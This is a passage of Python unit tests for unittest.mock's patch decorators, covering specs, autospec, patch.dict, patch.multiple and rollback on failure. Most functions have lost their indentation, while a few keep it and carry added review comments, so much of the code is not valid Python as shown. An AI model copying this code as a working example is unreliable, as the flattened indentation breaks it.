def test_patch_class_attribute(self):
@patch('%s.SomeClass.class_attribute' % __name__,
sentinel.ClassAttribute)
def test():
self.assertEqual(PTModule.SomeClass.class_attribute,
sentinel.ClassAttribute, "unpatched")
test()
self.assertIsNone(PTModule.SomeClass.class_attribute,
"patch not restored")
def test_patchobject_with_default_mock(self):
class Test(object):
something = sentinel.Original
something2 = sentinel.Original2
@patch.object(Test, 'something')
def test(mock):
self.assertEqual(mock, Test.something,
"Mock not passed into test function")
self.assertIsInstance(mock, MagicMock,
"patch with two arguments did not create a mock")
test()
@patch.object(Test, 'something')
@patch.object(Test, 'something2')
def test(this1, this2, mock1, mock2):
self.assertEqual(this1, sentinel.this1,
"Patched function didn't receive initial argument")
self.assertEqual(this2, sentinel.this2,
"Patched function didn't receive second argument")
self.assertEqual(mock1, Test.something2,
"Mock not passed into test function")
self.assertEqual(mock2, Test.something,
"Second Mock not passed into test function")
self.assertIsInstance(mock2, MagicMock,
"patch with two arguments did not create a mock")
self.assertIsInstance(mock2, MagicMock,
"patch with two arguments did not create a mock")
# A hack to test that new mocks are passed the second time
self.assertNotEqual(outerMock1, mock1, "unexpected value for mock1")
self.assertNotEqual(outerMock2, mock2, "unexpected value for mock1")
return mock1, mock2
outerMock1 = outerMock2 = None
outerMock1, outerMock2 = test(sentinel.this1, sentinel.this2)
# Test that executing a second time creates new mocks
test(sentinel.this1, sentinel.this2)
def test_patch_with_spec(self):
@patch('%s.SomeClass' % __name__, spec=SomeClass)
def test(MockSomeClass):
self.assertEqual(SomeClass, MockSomeClass)
self.assertTrue(is_instance(SomeClass.wibble, MagicMock))
self.assertRaises(AttributeError, lambda: SomeClass.not_wibble)
test()
def test_patchobject_with_spec(self):
@patch.object(SomeClass, 'class_attribute', spec=SomeClass)
def test(MockAttribute):
self.assertEqual(SomeClass.class_attribute, MockAttribute)
self.assertTrue(is_instance(SomeClass.class_attribute.wibble,
MagicMock))
self.assertRaises(AttributeError,
lambda: SomeClass.class_attribute.not_wibble)
test()
def test_patch_with_spec_as_list(self):
@patch('%s.SomeClass' % __name__, spec=['wibble'])
def test(MockSomeClass):
self.assertEqual(SomeClass, MockSomeClass)
self.assertTrue(is_instance(SomeClass.wibble, MagicMock))
self.assertRaises(AttributeError, lambda: SomeClass.not_wibble)
test()
def test_patchobject_with_spec_as_list(self):
@patch.object(SomeClass, 'class_attribute', spec=['wibble'])
def test(MockAttribute):
self.assertEqual(SomeClass.class_attribute, MockAttribute)
self.assertTrue(is_instance(SomeClass.class_attribute.wibble,
MagicMock))
self.assertRaises(AttributeError,
lambda: SomeClass.class_attribute.not_wibble)
test()
def test_nested_patch_with_spec_as_list(self):
# regression test for nested decorators
@patch('%s.open' % builtin_string)
@patch('%s.SomeClass' % __name__, spec=['wibble'])
def test(MockSomeClass, MockOpen):
self.assertEqual(SomeClass, MockSomeClass)
self.assertTrue(is_instance(SomeClass.wibble, MagicMock))
self.assertRaises(AttributeError, lambda: SomeClass.not_wibble)
test()
def test_patch_with_spec_as_boolean(self):
@patch('%s.SomeClass' % __name__, spec=True)
def test(MockSomeClass):
self.assertEqual(SomeClass, MockSomeClass)
# Should not raise attribute error
MockSomeClass.wibble
self.assertRaises(AttributeError, lambda: MockSomeClass.not_wibble)
test()
def test_patch_object_with_spec_as_boolean(self):
@patch.object(PTModule, 'SomeClass', spec=True)
def test(MockSomeClass):
self.assertEqual(SomeClass, MockSomeClass)
# Should not raise attribute error
MockSomeClass.wibble
self.assertRaises(AttributeError, lambda: MockSomeClass.not_wibble)
test()
def test_patch_class_acts_with_spec_is_inherited(self):
@patch('%s.SomeClass' % __name__, spec=True)
def test(MockSomeClass):
self.assertTrue(is_instance(MockSomeClass, MagicMock))
instance = MockSomeClass()
self.assertNotCallable(instance)
# Should not raise attribute error
instance.wibble
self.assertRaises(AttributeError, lambda: instance.not_wibble)
test()
def test_patch_with_create_mocks_non_existent_attributes(self):
@patch('%s.frooble' % builtin_string, sentinel.Frooble, create=True)
def test():
self.assertEqual(frooble, sentinel.Frooble)
test()
self.assertRaises(NameError, lambda: frooble)
def test_patchobject_with_create_mocks_non_existent_attributes(self):
@patch.object(SomeClass, 'frooble', sentinel.Frooble, create=True)
def test():
self.assertEqual(SomeClass.frooble, sentinel.Frooble)
test()
self.assertFalse(hasattr(SomeClass, 'frooble'))
def test_patch_wont_create_by_default(self):
try:
@patch('%s.frooble' % builtin_string, sentinel.Frooble)
def test():
self.assertEqual(frooble, sentinel.Frooble)
test()
except AttributeError:
pass
else:
self.fail('Patching non existent attributes should fail')
self.assertRaises(NameError, lambda: frooble)
def test_patchobject_wont_create_by_default(self):
try:
@patch.object(SomeClass, 'ord', sentinel.Frooble)
def test():
self.fail('Patching non existent attributes should fail')
test()
except AttributeError:
pass
else:
self.fail('Patching non existent attributes should fail')
self.assertFalse(hasattr(SomeClass, 'ord'))
def test_patch_builtins_without_create(self):
@patch(__name__+'.ord')
def test_ord(mock_ord):
mock_ord.return_value = 101
return ord('c')
@patch(__name__+'.open')
def test_open(mock_open):
m = mock_open.return_value
m.read.return_value = 'abcd'
fobj = open('doesnotexists.txt')
data = fobj.read()
fobj.close()
return data
self.assertEqual(test_ord(), 101)
self.assertEqual(test_open(), 'abcd')
def test_patch_with_static_methods(self):
class Foo(object):
@staticmethod
def woot():
return sentinel.Static
@patch.object(Foo, 'woot', staticmethod(lambda: sentinel.Patched))
def anonymous():
self.assertEqual(Foo.woot(), sentinel.Patched)
anonymous()
self.assertEqual(Foo.woot(), sentinel.Static)
def test_patch_local(self):
foo = sentinel.Foo
@patch.object(sentinel, 'Foo', 'Foo')
def anonymous():
self.assertEqual(sentinel.Foo, 'Foo')
anonymous()
self.assertEqual(sentinel.Foo, foo)
def test_patch_slots(self):
class Foo(object):
__slots__ = ('Foo',)
foo = Foo()
foo.Foo = sentinel.Foo
@patch.object(foo, 'Foo', 'Foo')
def anonymous():
self.assertEqual(foo.Foo, 'Foo')
anonymous()
self.assertEqual(foo.Foo, sentinel.Foo)
def test_patchobject_class_decorator(self):
class Something(object):
attribute = sentinel.Original
class Foo(object):
def test_method(other_self):
self.assertEqual(Something.attribute, sentinel.Patched,
"unpatched")
def not_test_method(other_self):
self.assertEqual(Something.attribute, sentinel.Original,
"non-test method patched")
Foo = patch.object(Something, 'attribute', sentinel.Patched)(Foo)
f = Foo()
f.test_method()
f.not_test_method()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
def test_patch_class_decorator(self):
class Something(object):
attribute = sentinel.Original
class Foo(object):
def test_method(other_self, mock_something):
self.assertEqual(PTModule.something, mock_something,
"unpatched")
def not_test_method(other_self):
self.assertEqual(PTModule.something, sentinel.Something,
"non-test method patched")
Foo = patch('%s.something' % __name__)(Foo)
f = Foo()
f.test_method()
f.not_test_method()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
self.assertEqual(PTModule.something, sentinel.Something,
"patch not restored")
def test_patchobject_twice(self):
class Something(object):
attribute = sentinel.Original
next_attribute = sentinel.Original2
@patch.object(Something, 'attribute', sentinel.Patched)
@patch.object(Something, 'attribute', sentinel.Patched)
def test():
self.assertEqual(Something.attribute, sentinel.Patched, "unpatched")
test()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
def test_patch_dict(self):
foo = {'initial': object(), 'other': 'something'}
original = foo.copy()
@patch.dict(foo)
def test():
foo['a'] = 3
del foo['initial']
foo['other'] = 'something else'
test()
self.assertEqual(foo, original)
@patch.dict(foo, {'a': 'b'})
def test():
self.assertEqual(len(foo), 3)
self.assertEqual(foo['a'], 'b')
test()
self.assertEqual(foo, original)
@patch.dict(foo, [('a', 'b')])
def test():
self.assertEqual(len(foo), 3)
self.assertEqual(foo['a'], 'b')
test()
self.assertEqual(foo, original)
def test_patch_dict_with_container_object(self):
foo = Container()
foo['initial'] = object()
foo['other'] = 'something'
original = foo.values.copy()
@patch.dict(foo)
def test():
foo['a'] = 3
del foo['initial']
foo['other'] = 'something else'
test()
self.assertEqual(foo.values, original)
@patch.dict(foo, {'a': 'b'})
def test():
self.assertEqual(len(foo.values), 3)
self.assertEqual(foo['a'], 'b')
test()
self.assertEqual(foo.values, original)
def test_patch_dict_with_clear(self):
foo = {'initial': object(), 'other': 'something'}
original = foo.copy()
@patch.dict(foo, clear=True)
def test():
self.assertEqual(foo, {})
foo['a'] = 3
foo['other'] = 'something else'
test()
self.assertEqual(foo, original)
@patch.dict(foo, {'a': 'b'}, clear=True)
def test():
self.assertEqual(foo, {'a': 'b'})
test()
self.assertEqual(foo, original)
@patch.dict(foo, [('a', 'b')], clear=True)
def test():
self.assertEqual(foo, {'a': 'b'})
test()
self.assertEqual(foo, original)
def test_patch_dict_with_container_object_and_clear(self):
foo = Container()
foo['initial'] = object()
foo['other'] = 'something'
original = foo.values.copy()
@patch.dict(foo, clear=True)
def test():
self.assertEqual(foo.values, {})
foo['a'] = 3
foo['other'] = 'something else'
test()
self.assertEqual(foo.values, original)
@patch.dict(foo, {'a': 'b'}, clear=True)
def test():
self.assertEqual(foo.values, {'a': 'b'})
test()
self.assertEqual(foo.values, original)
def test_name_preserved(self):
foo = {}
@patch('%s.SomeClass' % __name__, object())
@patch('%s.SomeClass' % __name__, object(), autospec=True)
@patch.object(SomeClass, object())
@patch.dict(foo)
def some_name():
pass
self.assertEqual(some_name.__name__, 'some_name')
def test_patch_with_exception(self):
foo = {}
@patch.dict(foo, {'a': 'b'})
def test():
raise NameError('Konrad')
try:
test()
except NameError:
pass
else:
self.fail('NameError not raised by test')
self.assertEqual(foo, {})
def test_patch_dict_with_string(self):
@patch.dict('os.environ', {'konrad_delong': 'some value'})
def test():
self.assertIn('konrad_delong', os.environ)
test()
def test_patch_descriptor(self):
# would be some effort to fix this - we could special case the
# builtin descriptors: classmethod, property, staticmethod
return
class Nothing(object):
foo = None
class Something(object):
foo = {}
@patch.object(Nothing, 'foo', 2)
@classmethod
def klass(cls):
self.assertIs(cls, Something)
@patch.object(Nothing, 'foo', 2)
@staticmethod
def static(arg):
return arg
@patch.dict(foo)
@classmethod
def klass_dict(cls):
self.assertIs(cls, Something)
@patch.dict(foo)
@staticmethod
def static_dict(arg):
return arg
# these will raise exceptions if patching descriptors is broken
self.assertEqual(Something.static('f00'), 'f00')
Something.klass()
self.assertEqual(Something.static_dict('f00'), 'f00')
Something.klass_dict()
something = Something()
self.assertEqual(something.static('f00'), 'f00')
something.klass()
self.assertEqual(something.static_dict('f00'), 'f00')
something.klass_dict()
def test_patch_spec_set(self):
@patch('%s.SomeClass' % __name__, spec=SomeClass, spec_set=True)
def test(MockClass):
MockClass.z = 'foo'
self.assertRaises(AttributeError, test)
@patch.object(support, 'SomeClass', spec=SomeClass, spec_set=True)
def test(MockClass):
MockClass.z = 'foo'
self.assertRaises(AttributeError, test)
@patch('%s.SomeClass' % __name__, spec_set=True)
def test(MockClass):
MockClass.z = 'foo'
self.assertRaises(AttributeError, test)
@patch.object(support, 'SomeClass', spec_set=True)
def test(MockClass):
MockClass.z = 'foo'
self.assertRaises(AttributeError, test)
def test_spec_set_inherit(self):
@patch('%s.SomeClass' % __name__, spec_set=True)
def test(MockClass):
instance = MockClass()
instance.z = 'foo'
self.assertRaises(AttributeError, test)
def test_patch_start_stop(self):
original = something
patcher = patch('%s.something' % __name__)
self.assertIs(something, original)
mock = patcher.start()
try:
self.assertIsNot(mock, original)
self.assertIs(something, mock)
finally:
patcher.stop()
self.assertIs(something, original)
def test_stop_without_start(self):
patcher = patch(foo_name, 'bar', 3)
# calling stop without start used to produce a very obscure error
self.assertRaises(RuntimeError, patcher.stop)
def test_patchobject_start_stop(self):
original = something
patcher = patch.object(PTModule, 'something', 'foo')
self.assertIs(something, original)
replaced = patcher.start()
try:
self.assertEqual(replaced, 'foo')
self.assertIs(something, replaced)
finally:
patcher.stop()
self.assertIs(something, original)
def test_patch_dict_start_stop(self):
d = {'foo': 'bar'}
original = d.copy()
patcher = patch.dict(d, [('spam', 'eggs')], clear=True)
self.assertEqual(d, original)
patcher.start()
try:
self.assertEqual(d, {'spam': 'eggs'})
finally:
patcher.stop()
self.assertEqual(d, original)
def test_patch_dict_class_decorator(self):
this = self
d = {'spam': 'eggs'}
original = d.copy()
class Test(object):
def test_first(self):
this.assertEqual(d, {'foo': 'bar'})
def test_second(self):
this.assertEqual(d, {'foo': 'bar'})
Test = patch.dict(d, {'foo': 'bar'}, clear=True)(Test)
self.assertEqual(d, original)
test = Test()
test.test_first()
self.assertEqual(d, original)
test.test_second()
self.assertEqual(d, original)
test = Test()
test.test_first()
self.assertEqual(d, original)
test.test_second()
self.assertEqual(d, original)
def test_get_only_proxy(self):
    """Patching an attribute through a get-only proxy must not leak the
    attribute into the proxy's own __dict__ nor touch the proxied object.
    """
    class Something(object):
        foo = 'foo'
    class SomethingElse:
        foo = 'foo'

    # Exercise both classes and an *instance* of each.  (The original
    # loop listed SomethingElse twice and never tested its instance.)
    for thing in Something, SomethingElse, Something(), SomethingElse():
        proxy = _get_proxy(thing)

        @patch.object(proxy, 'foo', 'bar')
        def test():
            self.assertEqual(proxy.foo, 'bar')
        test()

        # After the patch is undone, everything reads the original value
        # and the proxy itself never gained a local 'foo'.
        self.assertEqual(proxy.foo, 'foo')
        self.assertEqual(thing.foo, 'foo')
        self.assertNotIn('foo', proxy.__dict__)
def test_get_set_delete_proxy(self):
    """Patch an attribute through a proxy that forwards get, set and
    delete, and check nothing leaks into the proxy's own __dict__."""
    class Something(object):
        foo = 'foo'
    class SomethingElse:
        foo = 'foo'
    # NOTE(review): the loop lists SomethingElse twice (an *instance* of
    # it is never tested) and the proxy below wraps Something rather than
    # the loop variable `thing` -- both look like copy/paste slips, but
    # fixing them changes what the test covers and depends on _get_proxy
    # delegation semantics; confirm against upstream before touching.
    for thing in Something, SomethingElse, Something(), SomethingElse:
        proxy = _get_proxy(Something, get_only=False)
        @patch.object(proxy, 'foo', 'bar')
        def test():
            self.assertEqual(proxy.foo, 'bar')
        test()
        # After stop() the original value is visible again and the proxy
        # itself holds no local 'foo'.
        self.assertEqual(proxy.foo, 'foo')
        self.assertEqual(thing.foo, 'foo')
        self.assertNotIn('foo', proxy.__dict__)
def test_patch_keyword_args(self):
kwargs = {'side_effect': KeyError, 'foo.bar.return_value': 33,
'foo': MagicMock()}
patcher = patch(foo_name, **kwargs)
mock = patcher.start()
patcher.stop()
self.assertRaises(KeyError, mock)
self.assertEqual(mock.foo.bar(), 33)
self.assertIsInstance(mock.foo, MagicMock)
def test_patch_object_keyword_args(self):
kwargs = {'side_effect': KeyError, 'foo.bar.return_value': 33,
'foo': MagicMock()}
patcher = patch.object(Foo, 'f', **kwargs)
mock = patcher.start()
patcher.stop()
self.assertRaises(KeyError, mock)
self.assertEqual(mock.foo.bar(), 33)
self.assertIsInstance(mock.foo, MagicMock)
def test_patch_dict_keyword_args(self):
original = {'foo': 'bar'}
copy = original.copy()
patcher = patch.dict(original, foo=3, bar=4, baz=5)
patcher.start()
try:
self.assertEqual(original, dict(foo=3, bar=4, baz=5))
finally:
patcher.stop()
self.assertEqual(original, copy)
def test_autospec(self):
class Boo(object):
def __init__(self, a):
pass
def f(self, a):
pass
def g(self):
pass
foo = 'bar'
class Bar(object):
def a(self):
pass
def _test(mock):
mock(1)
mock.assert_called_with(1)
self.assertRaises(TypeError, mock)
def _test2(mock):
mock.f(1)
mock.f.assert_called_with(1)
self.assertRaises(TypeError, mock.f)
mock.g()
mock.g.assert_called_with()
self.assertRaises(TypeError, mock.g, 1)
self.assertRaises(AttributeError, getattr, mock, 'h')
mock.foo.lower()
mock.foo.lower.assert_called_with()
self.assertRaises(AttributeError, getattr, mock.foo, 'bar')
mock.Bar()
mock.Bar.assert_called_with()
mock.Bar.a()
mock.Bar.a.assert_called_with()
self.assertRaises(TypeError, mock.Bar.a, 1)
mock.Bar().a()
mock.Bar().a.assert_called_with()
self.assertRaises(TypeError, mock.Bar().a, 1)
self.assertRaises(AttributeError, getattr, mock.Bar, 'b')
self.assertRaises(AttributeError, getattr, mock.Bar(), 'b')
def function(mock):
_test(mock)
_test2(mock)
_test2(mock(1))
self.assertIs(mock, Foo)
return mock
test = patch(foo_name, autospec=True)(function)
mock = test()
self.assertIsNot(Foo, mock)
# test patching a second time works
test()
module = sys.modules[__name__]
test = patch.object(module, 'Foo', autospec=True)(function)
mock = test()
self.assertIsNot(Foo, mock)
# test patching a second time works
test()
def test_autospec_function(self):
@patch('%s.function' % __name__, autospec=True)
def test(mock):
function.assert_not_called()
self.assertRaises(AssertionError, function.assert_called)
self.assertRaises(AssertionError, function.assert_called_once)
function(1)
self.assertRaises(AssertionError, function.assert_not_called)
function.assert_called_with(1)
function.assert_called()
function.assert_called_once()
function(2, 3)
function.assert_called_with(2, 3)
self.assertRaises(TypeError, function)
self.assertRaises(AttributeError, getattr, function, 'foo')
test()
def test_autospec_keywords(self):
@patch('%s.function' % __name__, autospec=True,
return_value=3)
def test(mock_function):
#self.assertEqual(function.abc, 'foo')
return function(1, 2)
result = test()
self.assertEqual(result, 3)
def test_autospec_with_new(self):
patcher = patch('%s.function' % __name__, new=3, autospec=True)
self.assertRaises(TypeError, patcher.start)
module = sys.modules[__name__]
patcher = patch.object(module, 'function', new=3, autospec=True)
self.assertRaises(TypeError, patcher.start)
def test_autospec_with_object(self):
class Bar(Foo):
extra = []
patcher = patch(foo_name, autospec=Bar)
mock = patcher.start()
try:
self.assertIsInstance(mock, Bar)
self.assertIsInstance(mock.extra, list)
finally:
patcher.stop()
def test_autospec_inherits(self):
FooClass = Foo
patcher = patch(foo_name, autospec=True)
mock = patcher.start()
try:
self.assertIsInstance(mock, FooClass)
self.assertIsInstance(mock(3), FooClass)
finally:
patcher.stop()
def test_autospec_name(self):
patcher = patch(foo_name, autospec=True)
mock = patcher.start()
try:
self.assertIn(" name='Foo'", repr(mock))
self.assertIn(" name='Foo.f'", repr(mock.f))
self.assertIn(" name='Foo()'", repr(mock(None)))
self.assertIn(" name='Foo().f'", repr(mock(None).f))
finally:
patcher.stop()
def test_tracebacks(self):
@patch.object(Foo, 'f', object())
def test():
raise AssertionError
try:
test()
except:
err = sys.exc_info()
result = unittest.TextTestResult(None, None, 0)
traceback = result._exc_info_to_string(err, self)
self.assertIn('raise AssertionError', traceback)
def test_new_callable_patch(self):
    """patch(new_callable=...) must build a fresh object on every
    start() and honour the non-callable class it was given."""
    patcher = patch(foo_name, new_callable=NonCallableMagicMock)

    m1 = patcher.start()
    patcher.stop()
    m2 = patcher.start()
    patcher.stop()

    # Each start() must produce a brand-new mock ...
    self.assertIsNot(m1, m2)
    # ... and every one of them must be non-callable.  (The original
    # asserted m1 inside the loop, so m2 was never actually checked.)
    for mock in m1, m2:
        self.assertNotCallable(mock)
def test_new_callable_patch_object(self):
    """patch.object(new_callable=...) must build a fresh object on every
    start() and honour the non-callable class it was given."""
    patcher = patch.object(Foo, 'f', new_callable=NonCallableMagicMock)

    m1 = patcher.start()
    patcher.stop()
    m2 = patcher.start()
    patcher.stop()

    # Each start() must produce a brand-new mock ...
    self.assertIsNot(m1, m2)
    # ... and every one of them must be non-callable.  (The original
    # asserted m1 inside the loop, so m2 was never actually checked.)
    for mock in m1, m2:
        self.assertNotCallable(mock)
def test_new_callable_keyword_arguments(self):
class Bar(object):
kwargs = None
def __init__(self, **kwargs):
Bar.kwargs = kwargs
patcher = patch(foo_name, new_callable=Bar, arg1=1, arg2=2)
m = patcher.start()
try:
self.assertIs(type(m), Bar)
self.assertEqual(Bar.kwargs, dict(arg1=1, arg2=2))
finally:
patcher.stop()
def test_new_callable_spec(self):
class Bar(object):
kwargs = None
def __init__(self, **kwargs):
Bar.kwargs = kwargs
patcher = patch(foo_name, new_callable=Bar, spec=Bar)
patcher.start()
try:
self.assertEqual(Bar.kwargs, dict(spec=Bar))
finally:
patcher.stop()
patcher = patch(foo_name, new_callable=Bar, spec_set=Bar)
patcher.start()
try:
self.assertEqual(Bar.kwargs, dict(spec_set=Bar))
finally:
patcher.stop()
def test_new_callable_create(self):
non_existent_attr = '%s.weeeee' % foo_name
p = patch(non_existent_attr, new_callable=NonCallableMock)
self.assertRaises(AttributeError, p.start)
p = patch(non_existent_attr, new_callable=NonCallableMock,
create=True)
m = p.start()
try:
self.assertNotCallable(m, magic=False)
finally:
p.stop()
def test_new_callable_incompatible_with_new(self):
self.assertRaises(
ValueError, patch, foo_name, new=object(), new_callable=MagicMock
)
self.assertRaises(
ValueError, patch.object, Foo, 'f', new=object(),
new_callable=MagicMock
)
def test_new_callable_incompatible_with_autospec(self):
self.assertRaises(
ValueError, patch, foo_name, new_callable=MagicMock,
autospec=True
)
self.assertRaises(
ValueError, patch.object, Foo, 'f', new_callable=MagicMock,
autospec=True
)
def test_new_callable_inherit_for_mocks(self):
class MockSub(Mock):
pass
MockClasses = (
NonCallableMock, NonCallableMagicMock, MagicMock, Mock, MockSub
)
for Klass in MockClasses:
for arg in 'spec', 'spec_set':
kwargs = {arg: True}
p = patch(foo_name, new_callable=Klass, **kwargs)
m = p.start()
try:
instance = m.return_value
self.assertRaises(AttributeError, getattr, instance, 'x')
finally:
p.stop()
def test_new_callable_inherit_non_mock(self):
class NotAMock(object):
def __init__(self, spec):
self.spec = spec
p = patch(foo_name, new_callable=NotAMock, spec=True)
m = p.start()
try:
self.assertTrue(is_instance(m, NotAMock))
self.assertRaises(AttributeError, getattr, m, 'return_value')
finally:
p.stop()
self.assertEqual(m.spec, Foo)
def test_new_callable_class_decorating(self):
test = self
original = Foo
class SomeTest(object):
def _test(self, mock_foo):
test.assertIsNot(Foo, original)
test.assertIs(Foo, mock_foo)
test.assertIsInstance(Foo, SomeClass)
def test_two(self, mock_foo):
self._test(mock_foo)
def test_one(self, mock_foo):
self._test(mock_foo)
SomeTest = patch(foo_name, new_callable=SomeClass)(SomeTest)
SomeTest().test_one()
SomeTest().test_two()
self.assertIs(Foo, original)
def test_patch_multiple(self):
original_foo = Foo
original_f = Foo.f
original_g = Foo.g
patcher1 = patch.multiple(foo_name, f=1, g=2)
patcher2 = patch.multiple(Foo, f=1, g=2)
for patcher in patcher1, patcher2:
patcher.start()
try:
self.assertIs(Foo, original_foo)
self.assertEqual(Foo.f, 1)
self.assertEqual(Foo.g, 2)
finally:
patcher.stop()
self.assertIs(Foo, original_foo)
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
@patch.multiple(foo_name, f=3, g=4)
def test():
self.assertIs(Foo, original_foo)
self.assertEqual(Foo.f, 3)
self.assertEqual(Foo.g, 4)
test()
def test_patch_multiple_no_kwargs(self):
self.assertRaises(ValueError, patch.multiple, foo_name)
self.assertRaises(ValueError, patch.multiple, Foo)
def test_patch_multiple_create_mocks(self):
original_foo = Foo
original_f = Foo.f
original_g = Foo.g
@patch.multiple(foo_name, f=DEFAULT, g=3, foo=DEFAULT)
def test(f, foo):
self.assertIs(Foo, original_foo)
self.assertIs(Foo.f, f)
self.assertEqual(Foo.g, 3)
self.assertIs(Foo.foo, foo)
self.assertTrue(is_instance(f, MagicMock))
self.assertTrue(is_instance(foo, MagicMock))
test()
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_create_mocks_different_order(self):
# bug revealed by Jython!
original_f = Foo.f
original_g = Foo.g
patcher = patch.object(Foo, 'f', 3)
patcher.attribute_name = 'f'
other = patch.object(Foo, 'g', DEFAULT)
other.attribute_name = 'g'
patcher.additional_patchers = [other]
@patcher
def test(g):
self.assertIs(Foo.g, g)
self.assertEqual(Foo.f, 3)
test()
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_stacked_decorators(self):
original_foo = Foo
original_f = Foo.f
original_g = Foo.g
@patch.multiple(foo_name, f=DEFAULT)
@patch.multiple(foo_name, foo=DEFAULT)
@patch(foo_name + '.g')
def test1(g, **kwargs):
_test(g, **kwargs)
@patch.multiple(foo_name, f=DEFAULT)
@patch(foo_name + '.g')
@patch.multiple(foo_name, foo=DEFAULT)
def test2(g, **kwargs):
_test(g, **kwargs)
@patch(foo_name + '.g')
@patch.multiple(foo_name, f=DEFAULT)
@patch.multiple(foo_name, foo=DEFAULT)
def test3(g, **kwargs):
_test(g, **kwargs)
def _test(g, **kwargs):
f = kwargs.pop('f')
foo = kwargs.pop('foo')
self.assertFalse(kwargs)
self.assertIs(Foo, original_foo)
self.assertIs(Foo.f, f)
self.assertIs(Foo.g, g)
self.assertIs(Foo.foo, foo)
self.assertTrue(is_instance(f, MagicMock))
self.assertTrue(is_instance(g, MagicMock))
self.assertTrue(is_instance(foo, MagicMock))
test1()
test2()
test3()
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_create_mocks_patcher(self):
original_foo = Foo
original_f = Foo.f
original_g = Foo.g
patcher = patch.multiple(foo_name, f=DEFAULT, g=3, foo=DEFAULT)
result = patcher.start()
try:
f = result['f']
foo = result['foo']
self.assertEqual(set(result), set(['f', 'foo']))
self.assertIs(Foo, original_foo)
self.assertIs(Foo.f, f)
self.assertIs(Foo.foo, foo)
self.assertTrue(is_instance(f, MagicMock))
self.assertTrue(is_instance(foo, MagicMock))
finally:
patcher.stop()
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_decorating_class(self):
test = self
original_foo = Foo
original_f = Foo.f
original_g = Foo.g
class SomeTest(object):
def _test(self, f, foo):
test.assertIs(Foo, original_foo)
test.assertIs(Foo.f, f)
test.assertEqual(Foo.g, 3)
test.assertIs(Foo.foo, foo)
test.assertTrue(is_instance(f, MagicMock))
test.assertTrue(is_instance(foo, MagicMock))
def test_two(self, f, foo):
self._test(f, foo)
def test_one(self, f, foo):
self._test(f, foo)
SomeTest = patch.multiple(
foo_name, f=DEFAULT, g=3, foo=DEFAULT
)(SomeTest)
thing = SomeTest()
thing.test_one()
thing.test_two()
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_create(self):
patcher = patch.multiple(Foo, blam='blam')
self.assertRaises(AttributeError, patcher.start)
patcher = patch.multiple(Foo, blam='blam', create=True)
patcher.start()
try:
self.assertEqual(Foo.blam, 'blam')
finally:
patcher.stop()
self.assertFalse(hasattr(Foo, 'blam'))
def test_patch_multiple_spec_set(self):
# if spec_set works then we can assume that spec and autospec also
# work as the underlying machinery is the same
patcher = patch.multiple(Foo, foo=DEFAULT, spec_set=['a', 'b'])
result = patcher.start()
try:
self.assertEqual(Foo.foo, result['foo'])
Foo.foo.a(1)
Foo.foo.b(2)
Foo.foo.a.assert_called_with(1)
Foo.foo.b.assert_called_with(2)
self.assertRaises(AttributeError, setattr, Foo.foo, 'c', None)
finally:
patcher.stop()
def test_patch_multiple_new_callable(self):
class Thing(object):
pass
patcher = patch.multiple(
Foo, f=DEFAULT, g=DEFAULT, new_callable=Thing
)
result = patcher.start()
try:
self.assertIs(Foo.f, result['f'])
self.assertIs(Foo.g, result['g'])
self.assertIsInstance(Foo.f, Thing)
self.assertIsInstance(Foo.g, Thing)
self.assertIsNot(Foo.f, Foo.g)
finally:
patcher.stop()
def test_nested_patch_failure(self):
original_f = Foo.f
original_g = Foo.g
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'missing', 1)
@patch.object(Foo, 'f', 1)
def thing1():
pass
@patch.object(Foo, 'missing', 1)
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'f', 1)
def thing2():
pass
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'f', 1)
@patch.object(Foo, 'missing', 1)
def thing3():
pass
for func in thing1, thing2, thing3:
self.assertRaises(AttributeError, func)
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_new_callable_failure(self):
original_f = Foo.f
original_g = Foo.g
original_foo = Foo.foo
def crasher():
raise NameError('crasher')
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'foo', new_callable=crasher)
@patch.object(Foo, 'f', 1)
def thing1():
pass
@patch.object(Foo, 'foo', new_callable=crasher)
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'f', 1)
def thing2():
pass
@patch.object(Foo, 'g', 1)
@patch.object(Foo, 'f', 1)
@patch.object(Foo, 'foo', new_callable=crasher)
def thing3():
pass
for func in thing1, thing2, thing3:
self.assertRaises(NameError, func)
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
self.assertEqual(Foo.foo, original_foo)
def test_patch_multiple_failure(self):
original_f = Foo.f
original_g = Foo.g
patcher = patch.object(Foo, 'f', 1)
patcher.attribute_name = 'f'
good = patch.object(Foo, 'g', 1)
good.attribute_name = 'g'
bad = patch.object(Foo, 'missing', 1)
bad.attribute_name = 'missing'
for additionals in [good, bad], [bad, good]:
patcher.additional_patchers = additionals
@patcher
def func():
pass
self.assertRaises(AttributeError, func)
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
def test_patch_multiple_new_callable_failure(self):
original_f = Foo.f
original_g = Foo.g
original_foo = Foo.foo
def crasher():
raise NameError('crasher')
patcher = patch.object(Foo, 'f', 1)
patcher.attribute_name = 'f'
good = patch.object(Foo, 'g', 1)
good.attribute_name = 'g'
bad = patch.object(Foo, 'foo', new_callable=crasher)
bad.attribute_name = 'foo'
for additionals in [good, bad], [bad, good]:
patcher.additional_patchers = additionals
@patcher
def func():
pass
self.assertRaises(NameError, func)
self.assertEqual(Foo.f, original_f)
self.assertEqual(Foo.g, original_g)
self.assertEqual(Foo.foo, original_foo)
def test_patch_multiple_string_subclasses(self):
Foo = type('Foo', (str,), {'fish': 'tasty'})
foo = Foo()
@patch.multiple(foo, fish='nearly gone')
def test():
self.assertEqual(foo.fish, 'nearly gone')
test()
